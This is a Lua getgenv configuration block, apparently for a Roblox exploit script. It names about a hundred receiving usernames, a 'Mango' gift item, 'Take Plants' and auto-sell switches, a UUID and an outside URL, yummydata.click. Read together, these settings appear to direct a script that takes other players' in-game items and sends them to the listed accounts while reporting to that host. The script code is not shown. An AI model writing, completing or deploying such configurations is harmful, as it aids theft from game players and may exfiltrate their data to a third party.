getgenv().Config = {
    ["Account Main"] = {
        "LiamZeroMoon",
        "Xx_JackPrimalInf3rn0",
        "C0deAlphaJelly",
        "XxHaze_BanexX89",
        "OliverF0xS0nic2008",
        "XxR0gueZapxX2002",
        "Cart3rS0nicYT",
        "C0de_Glitch2014YT",
        "XxSophia_VoidxX99",
        "Am3liaDanc3r41",
        "W0lfAqua22",
        "Xx_JacksonTurboPix3l",
        "Vort3x_Claw59",
        "Turb0HawkBac0n",
        "JellyS0nicUltra",
        "CrystalNeonHaze2005",
        "RiftBlastChaos2004",
        "Xx_Harp3rBuild3rHaz3",
        "XxNeon_TurboxX2007",
        "Claw_RAVEN200331",
        "Om3gaStormy75",
        "ShadowGold3nRogu3",
        "QueenFusi0n202046",
        "PixelGamer201176",
        "GamerStream18_YT",
        "Hyp3rEchoWraith2024",
        "Isaac_Chill15",
        "GRACE_Bl0ck62",
        "XxSkySparkAcexX",
        "XxMaxPowerGamerxX",
        "Her0_King13",
        "CraftPhoenix43_YT",
        "Br00klynnBaneChill67",
        "EthanPlayzRogu32008",
        "Dani3lNightSparkly",
        "ZapBuilder201872",
        "TurboPho3nix53",
        "OrbitBan3Pix3lat3d",
        "LegendFr0stBl0ck",
        "Miner_Aqua36",
        "Chl0eQueenBlast39",
        "XxPaisl3ySparkGigaxX",
        "XxNora_SPARKLYXX91",
        "BrooklynnBlastEcho20",
        "JaxonPow3rBacon",
        "Luke_Queen43",
        "HyperByteFlick57",
        "S0nic_F0x12",
        "Oliv3r_OM3GA92",
        "XxRiderHyperLionxX",
        "XxPixelKingBanexX200",
        "MaxWraithBane62",
        "GlitchMoonPrism",
        "EagleChill202191",
        "QueenRider37",
        "Hyp3rEchoRogu3",
        "Fox_NEON10",
        "ChaosBlade54",
        "Addis0nB3ar54",
        "HazelHazeDrift2024",
        "Ethan_Viper202150",
        "StealthEch0202467",
        "EthanDrag0nNight",
        "MasterEchoZero2005",
        "JellyZapDark200287",
        "StarAc3Pix3l2009",
        "JAMES_Queen202080",
        "XxDuckKnightxX200721",
        "GigaStarEcho78",
        "XxMas0nL3g3ndxXYT",
        "LavaHawkDawn2024",
        "VenomEagleSilver2021",
        "H3nry_Flash23",
        "SavannahCod3Build3r5",
        "HyperLuckyFlick_YT",
        "LoganPixelated64",
        "HyperBuilderFlick201",
        "XxShadowCyberxX20118",
        "XxSilverFlashxXYT",
        "Bl0ckRiftMaster",
        "Fir3J3llyLucky",
        "ChillWraithRock3tYT",
        "RiftBearBane2014",
        "STORM_Aqua2011",
        "Alpha_Craze10",
        "Xx_Br00klynnDawnStre",
        "XxSparkPixelxX16",
        "Xx_ThunderCraftToxic",
        "StreamBane95",
        "Sky_Flick21",
        "LuckyPhoenixViper201",
        "UltraPixelated2021YT",
        "LightZ3roN3on",
        "XxL0ganZ00mxX2023",
        "GraysonDriftDancer",
        "N0vaNight11",
        "Xx_SavannahOmegaRock",
        "XxChaosGamerMinerxX",
        "XxBlock_CircuitxX55",
    },
    ["Item Gift"] = {
        "Mango",
    },
    ["Take Plants"] = true,
    ["Auto Sell If Found PopUp"] = true,
    ["Custom"] = {
        ["Enable"] = false,
        ["Min"] = 1000,
        ["Max"] = 90000,
    },
    ["Take Brainrots"] = false,
    ["UUID"] = "Dracular4444",
    ["Url"] = "https://yummydata.click"
}
